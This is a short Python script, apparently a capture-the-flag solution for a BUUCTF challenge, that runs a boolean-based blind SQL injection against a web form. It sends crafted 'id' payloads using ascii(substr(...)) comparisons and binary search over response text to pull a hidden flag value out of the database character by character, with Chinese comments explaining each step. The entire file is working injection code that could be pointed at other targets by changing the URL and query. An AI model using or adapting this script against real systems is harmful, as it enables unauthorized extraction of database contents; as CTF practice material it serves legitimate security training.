import requests
import time
import re
url='http://9650e54c-4038-4ec1-a5a2-412ac68accbe.node3.buuoj.cn'
flag = ''
for i in range(1,43):#flag的字符数为43位
max = 127#所有字符总数为127
min = 0
for c in range(0,127):
s = (int)((max+min)/2)#二分法找出正确字符,(int)为暴力截断
payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')' #从flag的第一个字符开始爆破,若flag的第i位字符的ASCII值大于s,则payload的值为0,反之则为1
r = requests.post(url,data = {'id':payload})
time.sleep(0.1)#延迟的秒数
if 'Hello, glzjin wants a girlfriend.' in str(r.content):
max=s
else:
min=s
if((max-min)<=1):
flag+=chr(max)
print(flag)
break
print(flag)
#填写自己环境的url